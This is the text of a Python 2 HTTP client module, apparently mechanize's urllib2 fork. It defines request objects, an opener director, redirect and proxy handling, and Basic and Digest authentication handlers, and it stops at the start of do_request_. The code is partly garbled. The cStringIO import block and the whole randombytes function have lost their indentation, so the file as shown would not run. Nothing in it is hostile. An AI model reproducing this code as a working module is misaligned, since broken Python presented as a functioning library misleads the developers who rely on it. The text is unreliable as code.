# the handler knows that the problem was, e.g., that it didn't know
# that hash algo that requested in the challenge, it would be good to
# pass that information along to the client, too.
# ftp errors aren't handled cleanly
# check digest against correct (i.e. non-apache) implementation
# Possible extensions:
# complex proxies XXX not sure what exactly was meant by this
# abstract factory for opener
import copy
import base64
import httplib
import mimetools
import logging
import os
import posixpath
import random
import re
import socket
import sys
import time
import urllib
import urlparse
import bisect
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# Digest helpers: prefer hashlib, fall back to the pre-2.5 md5/sha modules.
try:
    import hashlib
except ImportError:
    # python 2.4
    import md5
    import sha

    def sha1_digest(bytes):
        # Hex SHA-1 digest of *bytes* via the legacy sha module.
        return sha.new(bytes).hexdigest()

    def md5_digest(bytes):
        # Hex MD5 digest of *bytes* via the legacy md5 module.
        return md5.new(bytes).hexdigest()
else:
    def sha1_digest(bytes):
        # Hex SHA-1 digest of *bytes*.
        return hashlib.sha1(bytes).hexdigest()

    def md5_digest(bytes):
        # Hex MD5 digest of *bytes*.
        return hashlib.md5(bytes).hexdigest()


# socket._fileobject grew a close= keyword after 2.4; probe for it once.
try:
    socket._fileobject("fake socket", close=True)
except TypeError:
    # python <= 2.4
    create_readline_wrapper = socket._fileobject
else:
    def create_readline_wrapper(fh):
        # Wrap *fh* in a file-like object that closes it when closed.
        return socket._fileobject(fh, close=True)
# python 2.4 splithost has a bug in empty path component case
_hostprog = None

def splithost(url):
    """splithost('//host[:port]/path') --> 'host[:port]', '/path'."""
    global _hostprog
    if _hostprog is None:
        # Compile lazily, once, and cache at module level.
        import re
        _hostprog = re.compile('^//([^/?]*)(.*)$')

    m = _hostprog.match(url)
    if m is None:
        # No network-location prefix: the whole string is the path.
        return None, url
    return m.group(1, 2)
from urllib import (unwrap, unquote, splittype, quote,
addinfourl, splitport,
splitattr, ftpwrapper, splituser, splitpasswd, splitvalue)
# support for FileHandler, proxies via environment variables
from urllib import localhost, url2pathname, getproxies
from urllib2 import HTTPError, URLError
import _request
import _rfc3986
import _sockettimeout
from _clientcookie import CookieJar
from _response import closeable_response
# used in User-Agent header sent
__version__ = sys.version[:3]
_opener = None
def urlopen(url, data=None, timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
    """Open *url* with the module-wide shared opener, building the default
    opener lazily on first use."""
    global _opener
    opener = _opener
    if opener is None:
        opener = build_opener()
        _opener = opener
    return opener.open(url, data, timeout)
def install_opener(opener):
    # Replace the module-wide opener used by urlopen().
    global _opener
    _opener = opener
# copied from cookielib.py
_cut_port_re = re.compile(r":\d+$")

def request_host(request):
    """Return request-host, as defined by RFC 2965.

    Variation from RFC: returned value is lowercased, for convenient
    comparison.
    """
    host = urlparse.urlparse(request.get_full_url())[1]
    if not host:
        # No authority in the URL; fall back to the Host header.
        host = request.get_header("Host", "")
    # Strip at most one trailing :port.
    return _cut_port_re.sub("", host, 1).lower()
class Request:
    """An extensible URL request, mirroring urllib2.Request.

    The scheme (``type``) and ``host`` are derived lazily; the
    ``__getattr__`` fallback below triggers the corresponding get_*
    method when a private ``__r_*`` intermediate is read early.
    """

    def __init__(self, url, data=None, headers={},
                 origin_req_host=None, unverifiable=False):
        # unwrap('<URL:type://host/path>') --> 'type://host/path'
        self.__original = unwrap(url)
        self.type = None
        # self.__r_type is what's left after doing the splittype
        self.host = None
        self.port = None
        self._tunnel_host = None
        self.data = data
        self.headers = {}
        for key, value in headers.items():
            self.add_header(key, value)
        self.unredirected_hdrs = {}
        if origin_req_host is None:
            origin_req_host = request_host(self)
        self.origin_req_host = origin_req_host
        self.unverifiable = unverifiable

    def __getattr__(self, attr):
        # XXX this is a fallback mechanism to guard against these
        # methods getting called in a non-standard order.  this may be
        # too complicated and/or unnecessary.
        # XXX should the __r_XXX attributes be public?
        if attr[:12] == '_Request__r_':
            name = attr[12:]
            if hasattr(Request, 'get_' + name):
                # Run the lazy getter, which sets the attribute as a
                # side effect, then read it again.
                getattr(self, 'get_' + name)()
                return getattr(self, attr)
        raise AttributeError, attr

    def get_method(self):
        # POST when a body is present, GET otherwise.
        if self.has_data():
            return "POST"
        else:
            return "GET"

    # XXX these helper methods are lame

    def add_data(self, data):
        self.data = data

    def has_data(self):
        return self.data is not None

    def get_data(self):
        return self.data

    def get_full_url(self):
        return self.__original

    def get_type(self):
        # Lazily split and cache the URL scheme.
        if self.type is None:
            self.type, self.__r_type = splittype(self.__original)
            if self.type is None:
                raise ValueError, "unknown url type: %s" % self.__original
        return self.type

    def get_host(self):
        # Lazily split and cache the (unquoted) host component.
        if self.host is None:
            self.host, self.__r_host = splithost(self.__r_type)
            if self.host:
                self.host = unquote(self.host)
        return self.host

    def get_selector(self):
        # The request-URI sent on the request line.
        scheme, authority, path, query, fragment = _rfc3986.urlsplit(
            self.__r_host)
        if path == "":
            path = "/"  # RFC 2616, section 3.2.2
        fragment = None  # RFC 3986, section 3.5
        return _rfc3986.urlunsplit([scheme, authority, path, query, fragment])

    def set_proxy(self, host, type):
        orig_host = self.get_host()
        if self.get_type() == 'https' and not self._tunnel_host:
            # https goes through CONNECT tunnelling: remember the real
            # destination host and keep the request URL unchanged.
            self._tunnel_host = orig_host
        else:
            self.type = type
            # Send the full original URL to the proxy.
            self.__r_host = self.__original

        self.host = host

    def has_proxy(self):
        """Private method."""
        # has non-HTTPS proxy
        return self.__r_host == self.__original

    def get_origin_req_host(self):
        return self.origin_req_host

    def is_unverifiable(self):
        return self.unverifiable

    def add_header(self, key, val):
        # useful for something like authentication
        self.headers[key.capitalize()] = val

    def add_unredirected_header(self, key, val):
        # will not be added to a redirected request
        self.unredirected_hdrs[key.capitalize()] = val

    def has_header(self, header_name):
        return (header_name in self.headers or
                header_name in self.unredirected_hdrs)

    def get_header(self, header_name, default=None):
        # Normal headers take precedence over unredirected ones.
        return self.headers.get(
            header_name,
            self.unredirected_hdrs.get(header_name, default))

    def header_items(self):
        hdrs = self.unredirected_hdrs.copy()
        hdrs.update(self.headers)
        return hdrs.items()
class OpenerDirector:
    """Manages a chain of handlers that cooperate to open URLs.

    Handlers register themselves by method-name convention:
    <scheme>_open, <scheme>_request, <scheme>_response and
    <scheme>_error_<code> methods are discovered in add_handler().
    """

    def __init__(self):
        client_version = "Python-urllib/%s" % __version__
        self.addheaders = [('User-agent', client_version)]
        # manage the individual handlers
        self.handlers = []
        # Per-category maps of scheme (or error kind) -> sorted handlers.
        self.handle_open = {}
        self.handle_error = {}
        self.process_response = {}
        self.process_request = {}

    def add_handler(self, handler):
        if not hasattr(handler, "add_parent"):
            raise TypeError("expected BaseHandler instance, got %r" %
                            type(handler))

        added = False
        for meth in dir(handler):
            if meth in ["redirect_request", "do_open", "proxy_open"]:
                # oops, coincidental match
                continue

            # Split "<protocol>_<condition>" on the first underscore.
            i = meth.find("_")
            protocol = meth[:i]
            condition = meth[i+1:]

            if condition.startswith("error"):
                # e.g. http_error_404 -> protocol 'http', kind 404.
                j = condition.find("_") + i + 1
                kind = meth[j+1:]
                try:
                    kind = int(kind)
                except ValueError:
                    pass
                lookup = self.handle_error.get(protocol, {})
                self.handle_error[protocol] = lookup
            elif condition == "open":
                kind = protocol
                lookup = self.handle_open
            elif condition == "response":
                kind = protocol
                lookup = self.process_response
            elif condition == "request":
                kind = protocol
                lookup = self.process_request
            else:
                continue

            # Keep each handler list sorted by handler_order.
            handlers = lookup.setdefault(kind, [])
            if handlers:
                bisect.insort(handlers, handler)
            else:
                handlers.append(handler)
            added = True

        if added:
            # the handlers must work in an specific order, the order
            # is specified in a Handler attribute
            bisect.insort(self.handlers, handler)
            handler.add_parent(self)

    def close(self):
        # Only exists for backwards compatibility.
        pass

    def _call_chain(self, chain, kind, meth_name, *args):
        # Handlers raise an exception if no one else should try to handle
        # the request, or return None if they can't but another handler
        # could.  Otherwise, they return the response.
        handlers = chain.get(kind, ())
        for handler in handlers:
            func = getattr(handler, meth_name)

            result = func(*args)
            if result is not None:
                return result

    def _open(self, req, data=None):
        # Try default_open, then the scheme-specific openers, then
        # unknown_open as a last resort.
        result = self._call_chain(self.handle_open, 'default',
                                  'default_open', req)
        if result:
            return result

        protocol = req.get_type()
        result = self._call_chain(self.handle_open, protocol, protocol +
                                  '_open', req)
        if result:
            return result

        return self._call_chain(self.handle_open, 'unknown',
                                'unknown_open', req)

    def error(self, proto, *args):
        if proto in ('http', 'https'):
            # XXX http[s] protocols are special-cased
            dict = self.handle_error['http'] # https is not different than http
            proto = args[2]  # YUCK!
            meth_name = 'http_error_%s' % proto
            http_err = 1
            orig_args = args
        else:
            dict = self.handle_error
            meth_name = proto + '_error'
            http_err = 0
        args = (dict, proto, meth_name) + args
        result = self._call_chain(*args)
        if result:
            return result

        if http_err:
            # Nothing handled the specific code; fall back to the
            # catch-all http_error_default.
            args = (dict, 'default', 'http_error_default') + orig_args
            return self._call_chain(*args)
# XXX probably also want an abstract factory that knows when it makes
# sense to skip a superclass in favor of a subclass and when it might
# make sense to include both
def build_opener(*handlers):
    """Create an opener object from a list of handlers.

    The opener will use several default handlers, including support
    for HTTP, FTP and when applicable, HTTPS.

    If any of the handlers passed as arguments are subclasses of the
    default handlers, the default handlers will not be used.
    """
    import types

    def _is_class(obj):
        # Covers both old-style (ClassType) and new-style classes.
        return isinstance(obj, (types.ClassType, type))

    opener = OpenerDirector()
    default_classes = [ProxyHandler, UnknownHandler, HTTPHandler,
                       HTTPDefaultErrorHandler, HTTPRedirectHandler,
                       FTPHandler, FileHandler, HTTPErrorProcessor]
    if hasattr(httplib, 'HTTPS'):
        default_classes.append(HTTPSHandler)

    # Drop any default whose role is taken over by a supplied handler
    # (given either as a class or as an instance).
    skip = set()
    for default in default_classes:
        for supplied in handlers:
            if _is_class(supplied):
                if issubclass(supplied, default):
                    skip.add(default)
            elif isinstance(supplied, default):
                skip.add(default)

    for default in default_classes:
        if default not in skip:
            opener.add_handler(default())

    for handler in handlers:
        if _is_class(handler):
            handler = handler()
        opener.add_handler(handler)
    return opener
class BaseHandler:
    """Common plumbing shared by every handler class.

    ``handler_order`` determines a handler's position in the sorted
    chains built by OpenerDirector.
    """
    handler_order = 500

    def add_parent(self, parent):
        # Called by OpenerDirector.add_handler(); gives the handler a
        # way back to the director (e.g. for self.parent.error()).
        self.parent = parent

    def close(self):
        # Only exists for backwards compatibility.
        pass

    def __lt__(self, other):
        if hasattr(other, "handler_order"):
            return self.handler_order < other.handler_order
        # Preserve the old behaviour of sorting custom classes that are
        # unaware of handler_order after the default handlers.
        return True
class HTTPErrorProcessor(BaseHandler):
    """Process HTTP error responses.

    The purpose of this handler is to allow other response processors a
    look-in by removing the call to parent.error() from
    AbstractHTTPHandler.

    For non-2xx error codes, this just passes the job on to the
    Handler.<proto>_error_<code> methods, via the OpenerDirector.error
    method.  Eventually, HTTPDefaultErrorHandler will raise an HTTPError
    if no other handler handles the error.
    """
    handler_order = 1000  # after all other processors

    def http_response(self, request, response):
        code, msg, hdrs = response.code, response.msg, response.info()

        # RFC 2616: a "2xx" code means the request was successfully
        # received, understood, and accepted -- pass those through.
        if 200 <= code < 300:
            return response
        # hardcoded 'http' is NOT a bug: https errors take the same path
        return self.parent.error('http', request, response, code, msg, hdrs)

    https_response = http_response
class HTTPDefaultErrorHandler(BaseHandler):
    """Last-resort handler: turn any still-unhandled HTTP error into a
    raised HTTPError."""

    def http_error_default(self, req, fp, code, msg, hdrs):
        # why these error methods took the code, msg, headers args in the first
        # place rather than a response object, I don't know, but to avoid
        # multiple wrapping, we're discarding them

        if isinstance(fp, HTTPError):
            response = fp
        else:
            response = HTTPError(
                req.get_full_url(), code, msg, hdrs, fp)
        # Sanity-check that the response we raise matches the arguments.
        assert code == response.code
        assert msg == response.msg
        assert hdrs == response.hdrs
        raise response
class HTTPRedirectHandler(BaseHandler):
    """Follow HTTP 3xx redirects (plus the non-standard "refresh").

    http_error_301/303/307/refresh all alias http_error_302, which
    builds a new request via redirect_request() and re-opens it through
    the parent OpenerDirector, with loop detection.
    """
    # maximum number of redirections to any single URL
    # this is needed because of the state that cookies introduce
    max_repeats = 4
    # maximum total number of redirections (regardless of URL) before
    # assuming we're in a loop
    max_redirections = 10
    # Implementation notes:
    # To avoid the server sending us into an infinite loop, the request
    # object needs to track what URLs we have already seen.  Do this by
    # adding a handler-specific attribute to the Request object.  The value
    # of the dict is used to count the number of times the same URL has
    # been visited.  This is needed because visiting the same URL twice
    # does not necessarily imply a loop, thanks to state introduced by
    # cookies.
    # Always unhandled redirection codes:
    # 300 Multiple Choices: should not handle this here.
    # 304 Not Modified: no need to handle here: only of interest to caches
    #     that do conditional GETs
    # 305 Use Proxy: probably not worth dealing with here
    # 306 Unused: what was this for in the previous versions of protocol??
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        """Return a Request or None in response to a redirect.

        This is called by the http_error_30x methods when a
        redirection response is received.  If a redirection should
        take place, return a new Request to allow http_error_30x to
        perform the redirect.  Otherwise, raise HTTPError if no-one
        else should try to handle this url.  Return None if you can't
        but another Handler might.
        """
        m = req.get_method()
        if (code in (301, 302, 303, 307, "refresh") and m in ("GET", "HEAD")
            or code in (301, 302, 303, "refresh") and m == "POST"):
            # Strictly (according to RFC 2616), 301 or 302 in response
            # to a POST MUST NOT cause a redirection without confirmation
            # from the user (of urllib2, in this case).  In practice,
            # essentially all clients do redirect in this case, so we do
            # the same.
            # TODO: really refresh redirections should be visiting; tricky to fix
            new = _request.Request(
                newurl,
                headers=req.headers,
                origin_req_host=req.get_origin_req_host(),
                unverifiable=True,
                visit=False,
                timeout=req.timeout)
            # Remember the request that started the redirect chain so
            # later consumers can recover it.
            new._origin_req = getattr(req, "_origin_req", req)
            return new
        else:
            raise HTTPError(req.get_full_url(), code, msg, headers, fp)
    def http_error_302(self, req, fp, code, msg, headers):
        """Build and re-open the redirected request, with loop detection."""
        # Some servers (incorrectly) return multiple Location headers
        # (so probably same goes for URI).  Use first header.
        if 'location' in headers:
            newurl = headers.getheaders('location')[0]
        elif 'uri' in headers:
            newurl = headers.getheaders('uri')[0]
        else:
            # No redirect target supplied; give other handlers a chance.
            return
        newurl = _rfc3986.clean_url(newurl, "latin-1")
        # The Location value may be relative; resolve it against the URL
        # that was actually requested.
        newurl = _rfc3986.urljoin(req.get_full_url(), newurl)
        # XXX Probably want to forget about the state of the current
        # request, although that might interact poorly with other
        # handlers that also use handler-specific request attributes
        new = self.redirect_request(req, fp, code, msg, headers, newurl)
        if new is None:
            return
        # loop detection
        # .redirect_dict has a key url if url was previously visited.
        if hasattr(req, 'redirect_dict'):
            visited = new.redirect_dict = req.redirect_dict
            if (visited.get(newurl, 0) >= self.max_repeats or
                len(visited) >= self.max_redirections):
                raise HTTPError(req.get_full_url(), code,
                                self.inf_msg + msg, headers, fp)
        else:
            visited = new.redirect_dict = req.redirect_dict = {}
        visited[newurl] = visited.get(newurl, 0) + 1
        # Don't close the fp until we are sure that we won't use it
        # with HTTPError.
        fp.read()
        fp.close()
        return self.parent.open(new)
    # These redirect styles all share the 302 implementation.
    http_error_301 = http_error_303 = http_error_307 = http_error_302
    http_error_refresh = http_error_302
    inf_msg = "The HTTP server returned a redirect error that would " \
              "lead to an infinite loop.\n" \
              "The last 30x error message was:\n"
def _parse_proxy(proxy):
    """Return (scheme, user, password, host/port) given a URL or an authority.

    If a URL is supplied, it must have an authority (host:port) component.
    According to RFC 3986, having an authority component means the URL must
    have two slashes after the scheme:

    >>> _parse_proxy('file:/ftp.example.com/')
    Traceback (most recent call last):
    ValueError: proxy URL with no authority: 'file:/ftp.example.com/'

    The first three items of the returned tuple may be None.

    Examples of authority parsing:

    >>> _parse_proxy('proxy.example.com')
    (None, None, None, 'proxy.example.com')
    >>> _parse_proxy('proxy.example.com:3128')
    (None, None, None, 'proxy.example.com:3128')

    The authority component may optionally include userinfo (assumed to be
    username:password):

    >>> _parse_proxy('joe:password@proxy.example.com')
    (None, 'joe', 'password', 'proxy.example.com')
    >>> _parse_proxy('joe:password@proxy.example.com:3128')
    (None, 'joe', 'password', 'proxy.example.com:3128')

    Same examples, but with URLs instead:

    >>> _parse_proxy('http://proxy.example.com/')
    ('http', None, None, 'proxy.example.com')
    >>> _parse_proxy('http://proxy.example.com:3128/')
    ('http', None, None, 'proxy.example.com:3128')
    >>> _parse_proxy('http://joe:password@proxy.example.com/')
    ('http', 'joe', 'password', 'proxy.example.com')
    >>> _parse_proxy('http://joe:password@proxy.example.com:3128')
    ('http', 'joe', 'password', 'proxy.example.com:3128')

    Everything after the authority is ignored:

    >>> _parse_proxy('ftp://joe:password@proxy.example.com/rubbish:3128')
    ('ftp', 'joe', 'password', 'proxy.example.com')

    Test for no trailing '/' case:

    >>> _parse_proxy('http://joe:password@proxy.example.com')
    ('http', 'joe', 'password', 'proxy.example.com')
    """
    scheme, rest = splittype(proxy)
    if rest.startswith("/"):
        # A full URL: RFC 3986 (ss 3.2 and 3.3) requires '//' before the
        # authority, after which the path is empty or starts with '/'.
        if not rest.startswith("//"):
            raise ValueError("proxy URL with no authority: %r" % proxy)
        end = rest.find("/", 2)
        if end == -1:
            end = None
        authority = rest[2:end]
    else:
        # A bare authority was given, so there is no scheme.
        scheme = None
        authority = proxy
    userinfo, hostport = splituser(authority)
    user = password = None
    if userinfo is not None:
        user, password = splitpasswd(userinfo)
    return scheme, user, password, hostport
class ProxyHandler(BaseHandler):
    """Rewrite requests so they are sent through the configured proxies.

    proxies maps a URL scheme (e.g. 'http') to a proxy given as an
    authority or a URL.
    """
    # Proxies must be in front
    handler_order = 100
    def __init__(self, proxies=None, proxy_bypass=None):
        if proxies is None:
            proxies = getproxies()
        assert hasattr(proxies, 'has_key'), "proxies must be a mapping"
        self.proxies = proxies
        # Install a '<scheme>_open' method per configured scheme.  The
        # lambda's default arguments freeze the current loop values of
        # url/type (avoiding the late-binding closure pitfall), so each
        # generated method forwards to proxy_open with its own proxy.
        for type, url in proxies.items():
            setattr(self, '%s_open' % type,
                    lambda r, proxy=url, type=type, meth=self.proxy_open: \
                    meth(r, proxy, type))
        if proxy_bypass is None:
            proxy_bypass = urllib.proxy_bypass
        self._proxy_bypass = proxy_bypass
    def proxy_open(self, req, proxy, type):
        """Point *req* at *proxy*; may re-open if the scheme changes."""
        orig_type = req.get_type()
        proxy_type, user, password, hostport = _parse_proxy(proxy)
        if proxy_type is None:
            # Proxy given as a bare authority: assume the request's scheme.
            proxy_type = orig_type
        if req.get_host() and self._proxy_bypass(req.get_host()):
            # Host is on the bypass list; let other handlers open directly.
            return None
        if user and password:
            user_pass = '%s:%s' % (unquote(user), unquote(password))
            creds = base64.b64encode(user_pass).strip()
            req.add_header('Proxy-authorization', 'Basic ' + creds)
        hostport = unquote(hostport)
        req.set_proxy(hostport, proxy_type)
        if orig_type == proxy_type or orig_type == 'https':
            # let other handlers take care of it
            return None
        else:
            # need to start over, because the other handlers don't
            # grok the proxy's URL type
            # e.g. if we have a constructor arg proxies like so:
            # {'http': 'ftp://proxy.example.com'}, we may end up turning
            # a request for http://acme.example.com/a into one for
            # ftp://proxy.example.com/a
            return self.parent.open(req)
class HTTPPasswordMgr:
    """Map (realm, URI) pairs to (user, password) credentials."""

    def __init__(self):
        self.passwd = {}

    def add_password(self, realm, uri, user, passwd):
        """Register credentials for *realm* at one URI or a sequence of URIs."""
        # uri could be a single URI or a sequence
        if isinstance(uri, basestring):
            uri = [uri]
        realm_map = self.passwd.setdefault(realm, {})
        # Store the key both with and without the scheme's default port so
        # lookups succeed whichever form the request happens to use.
        for default_port in (True, False):
            key = tuple(
                [self.reduce_uri(u, default_port) for u in uri])
            realm_map[key] = (user, passwd)

    def find_user_password(self, realm, authuri):
        """Return (user, password) for *authuri*, or (None, None)."""
        candidates = self.passwd.get(realm, {})
        for default_port in (True, False):
            reduced_authuri = self.reduce_uri(authuri, default_port)
            for uris, authinfo in candidates.iteritems():
                for uri in uris:
                    if self.is_suburi(uri, reduced_authuri):
                        return authinfo
        return None, None

    def reduce_uri(self, uri, default_port=True):
        """Accept authority or URI and extract only the authority and path."""
        # note HTTP URLs do not have a userinfo component
        parts = urlparse.urlsplit(uri)
        if parts[1]:
            # A full URI was given.
            scheme = parts[0]
            authority = parts[1]
            path = parts[2] or '/'
        else:
            # Just a host or host:port.
            scheme = None
            authority = uri
            path = '/'
        host, port = splitport(authority)
        if default_port and port is None and scheme is not None:
            # Append the scheme's well-known port when none was given.
            dport = {"http": 80, "https": 443}.get(scheme)
            if dport is not None:
                authority = "%s:%d" % (host, dport)
        return authority, path

    def is_suburi(self, base, test):
        """Check if test is below base in a URI tree

        Both args must be URIs in reduced form.
        """
        if base == test:
            return True
        if base[0] != test[0]:
            return False
        prefix = posixpath.commonprefix((base[1], test[1]))
        return len(prefix) == len(base[1])
class HTTPPasswordMgrWithDefaultRealm(HTTPPasswordMgr):
    """Password manager that falls back to a wildcard (None) realm."""

    def find_user_password(self, realm, authuri):
        # Try the exact realm first; the None realm is the catch-all.
        user, password = HTTPPasswordMgr.find_user_password(
            self, realm, authuri)
        if user is None:
            return HTTPPasswordMgr.find_user_password(self, None, authuri)
        return user, password
class AbstractBasicAuthHandler:
    """Shared machinery for HTTP Basic authentication (RFC 2617)."""

    # XXX this allows for multiple auth-schemes, but will stupidly pick
    # the last one with a realm specified.

    # Allow both double- and single-quoted realm values
    # (single quotes are a violation of the RFC, but appear in the wild).
    rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+'
                    'realm=(["\'])(.*?)\\2', re.I)

    # XXX could pre-emptively send auth info already accepted (RFC 2617,
    # end of section 2, and section 1.2 immediately after "credentials"
    # production).

    def __init__(self, password_mgr=None):
        if password_mgr is None:
            password_mgr = HTTPPasswordMgr()
        self.passwd = password_mgr
        self.add_password = self.passwd.add_password

    def http_error_auth_reqed(self, authreq, host, req, headers):
        """Answer a challenge found in the *authreq* header, if Basic."""
        # host may be an authority (without userinfo) or a URL with an
        # authority.
        # XXX could be multiple headers
        challenge = headers.get(authreq, None)
        if not challenge:
            return None
        match = AbstractBasicAuthHandler.rx.search(challenge)
        if not match:
            return None
        scheme, quote, realm = match.groups()
        if scheme.lower() != 'basic':
            return None
        return self.retry_http_basic_auth(host, req, realm)

    def retry_http_basic_auth(self, host, req, realm):
        """Re-issue *req* with Basic credentials for *realm*, if known."""
        user, pw = self.passwd.find_user_password(realm, host)
        if pw is None:
            return None
        raw = "%s:%s" % (user, pw)
        auth = 'Basic %s' % base64.b64encode(raw).strip()
        # If we already sent exactly these credentials and were still
        # challenged, retrying would loop forever.
        if req.headers.get(self.auth_header, None) == auth:
            return None
        newreq = copy.copy(req)
        newreq.add_header(self.auth_header, auth)
        newreq.visit = False
        return self.parent.open(newreq)
class HTTPBasicAuthHandler(AbstractBasicAuthHandler, BaseHandler):
    """Answer 401 responses from the origin server with Basic credentials."""

    auth_header = 'Authorization'

    def http_error_401(self, req, fp, code, msg, headers):
        # Pass the full URL so the password manager can match by URI.
        return self.http_error_auth_reqed(
            'www-authenticate', req.get_full_url(), req, headers)
class ProxyBasicAuthHandler(AbstractBasicAuthHandler, BaseHandler):
    """Answer 407 responses from a proxy with Basic credentials."""

    auth_header = 'Proxy-authorization'

    def http_error_407(self, req, fp, code, msg, headers):
        # http_error_auth_reqed requires that there is no userinfo
        # component in authority.  Assume there isn't one, since urllib2
        # does not (and should not, RFC 3986 s. 3.2.1) support requests
        # for URLs containing userinfo.
        return self.http_error_auth_reqed(
            'proxy-authenticate', req.get_host(), req, headers)
def randombytes(n):
"""Return n random bytes."""
# Use /dev/urandom if it is available. Fall back to random module
# if not. It might be worthwhile to extend this function to use
# other platform-specific mechanisms for getting random bytes.
if os.path.exists("/dev/urandom"):
f = open("/dev/urandom")
s = f.read(n)
f.close()
return s
else:
L = [chr(random.randrange(0, 256)) for i in range(n)]
return "".join(L)
class AbstractDigestAuthHandler:
    """Shared implementation of HTTP Digest authentication (RFC 2617).

    Subclasses provide ``auth_header`` and route the relevant HTTP error
    (401 or 407) into http_error_auth_reqed().
    """
    # Digest authentication is specified in RFC 2617.

    # XXX The client does not inspect the Authentication-Info header
    # in a successful response.

    # XXX It should be possible to test this implementation against
    # a mock server that just generates a static set of challenges.

    # XXX qop="auth-int" support is shaky

    def __init__(self, passwd=None):
        if passwd is None:
            passwd = HTTPPasswordMgr()
        self.passwd = passwd
        self.add_password = self.passwd.add_password
        # State for retry limiting and nonce-count bookkeeping.
        self.retried = 0
        self.nonce_count = 0
        self.last_nonce = None

    def reset_retry_count(self):
        """Forget previous failures; called after each complete attempt."""
        self.retried = 0

    def http_error_auth_reqed(self, auth_header, host, req, headers):
        """React to a 401/407 carrying a Digest challenge, if any."""
        authreq = headers.get(auth_header, None)
        if self.retried > 5:
            # Don't fail endlessly - if we failed once, we'll probably
            # fail a second time. Hm. Unless the Password Manager is
            # prompting for the information. Crap. This isn't great
            # but it's better than the current 'repeat until recursion
            # depth exceeded' approach <wink>
            raise HTTPError(req.get_full_url(), 401, "digest auth failed",
                            headers, None)
        else:
            self.retried += 1
        if authreq:
            scheme = authreq.split()[0]
            if scheme.lower() == 'digest':
                return self.retry_http_digest_auth(req, authreq)

    def retry_http_digest_auth(self, req, auth):
        """Re-issue *req* with an authorization header answering *auth*."""
        token, challenge = auth.split(' ', 1)
        chal = parse_keqv_list(parse_http_list(challenge))
        auth = self.get_authorization(req, chal)
        if auth:
            auth_val = 'Digest %s' % auth
            if req.headers.get(self.auth_header, None) == auth_val:
                # We already sent exactly these credentials and were
                # challenged again; retrying would loop.
                return None
            newreq = copy.copy(req)
            newreq.add_unredirected_header(self.auth_header, auth_val)
            newreq.visit = False
            return self.parent.open(newreq)

    def get_cnonce(self, nonce):
        # The cnonce-value is an opaque
        # quoted string value provided by the client and used by both client
        # and server to avoid chosen plaintext attacks, to provide mutual
        # authentication, and to provide some message integrity protection.
        # This isn't a fabulous effort, but it's probably Good Enough.
        dig = sha1_digest("%s:%s:%s:%s" % (self.nonce_count, nonce,
                                           time.ctime(), randombytes(8)))
        return dig[:16]

    def get_authorization(self, req, chal):
        """Build the Digest Authorization value, or None if we can't."""
        try:
            realm = chal['realm']
            nonce = chal['nonce']
            qop = chal.get('qop')
            algorithm = chal.get('algorithm', 'MD5')
            # mod_digest doesn't send an opaque, even though it isn't
            # supposed to be optional
            opaque = chal.get('opaque', None)
        except KeyError:
            return None
        H, KD = self.get_algorithm_impls(algorithm)
        if H is None:
            # Unsupported digest algorithm: give up on this challenge.
            return None
        user, pw = self.passwd.find_user_password(realm, req.get_full_url())
        if user is None:
            return None
        # XXX not implemented yet
        if req.has_data():
            entdig = self.get_entity_digest(req.get_data(), chal)
        else:
            entdig = None
        A1 = "%s:%s:%s" % (user, realm, pw)
        A2 = "%s:%s" % (req.get_method(),
                        # XXX selector: what about proxies and full urls
                        req.get_selector())
        if qop == 'auth':
            # nc must count reuses of the same server nonce (RFC 2617).
            if nonce == self.last_nonce:
                self.nonce_count += 1
            else:
                self.nonce_count = 1
                self.last_nonce = nonce
            ncvalue = '%08x' % self.nonce_count
            cnonce = self.get_cnonce(nonce)
            noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, H(A2))
            respdig = KD(H(A1), noncebit)
        elif qop is None:
            respdig = KD(H(A1), "%s:%s" % (nonce, H(A2)))
        else:
            # XXX handle auth-int.
            logger = logging.getLogger("mechanize.auth")
            logger.info("digest auth auth-int qop is not supported, not "
                        "handling digest authentication")
            return None
        # XXX should the partial digests be encoded too?
        base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
               'response="%s"' % (user, realm, nonce, req.get_selector(),
                                  respdig)
        if opaque:
            base += ', opaque="%s"' % opaque
        if entdig:
            base += ', digest="%s"' % entdig
        base += ', algorithm="%s"' % algorithm
        if qop:
            base += ', qop=auth, nc=%s, cnonce="%s"' % (ncvalue, cnonce)
        return base

    def get_algorithm_impls(self, algorithm):
        """Return (hash, key-digest) callables for *algorithm*.

        Returns (None, None) for unsupported algorithms; callers already
        check ``H is None``.  (Previously an unsupported algorithm left
        H unassigned and the return raised UnboundLocalError.)
        """
        # algorithm should be case-insensitive according to RFC2617
        algorithm = algorithm.upper()
        H = None
        if algorithm == 'MD5':
            H = md5_digest
        elif algorithm == 'SHA':
            H = sha1_digest
        # XXX MD5-sess
        if H is None:
            return None, None
        KD = lambda s, d: H("%s:%s" % (s, d))
        return H, KD

    def get_entity_digest(self, data, chal):
        # XXX not implemented yet
        return None
class HTTPDigestAuthHandler(BaseHandler, AbstractDigestAuthHandler):
    """An authentication protocol defined by RFC 2069

    Digest authentication improves on basic authentication because it
    does not transmit passwords in the clear.
    """

    auth_header = 'Authorization'
    handler_order = 490  # before Basic auth

    def http_error_401(self, req, fp, code, msg, headers):
        # Digest credentials are matched by authority, so extract the
        # netloc component from the full URL before delegating.
        host = urlparse.urlparse(req.get_full_url())[1]
        retry = self.http_error_auth_reqed(
            'www-authenticate', host, req, headers)
        self.reset_retry_count()
        return retry
class ProxyDigestAuthHandler(BaseHandler, AbstractDigestAuthHandler):
    """Digest authentication against an HTTP proxy (407 responses)."""

    auth_header = 'Proxy-Authorization'
    handler_order = 490  # before Basic auth

    def http_error_407(self, req, fp, code, msg, headers):
        # Proxies identify the target by authority, not full URL.
        retry = self.http_error_auth_reqed(
            'proxy-authenticate', req.get_host(), req, headers)
        self.reset_retry_count()
        return retry
class AbstractHTTPHandler(BaseHandler):
    """Shared plumbing for the HTTP and HTTPS handlers.

    do_request_ normalises outgoing requests (mandatory headers);
    do_open performs the network exchange via an httplib-compatible
    connection class.
    """
    def __init__(self, debuglevel=0):
        self._debuglevel = debuglevel
    def set_http_debuglevel(self, level):
        # Forwarded to the httplib connection in do_open().
        self._debuglevel = level
    def do_request_(self, request):
        """Fill in mandatory headers before the request goes out."""
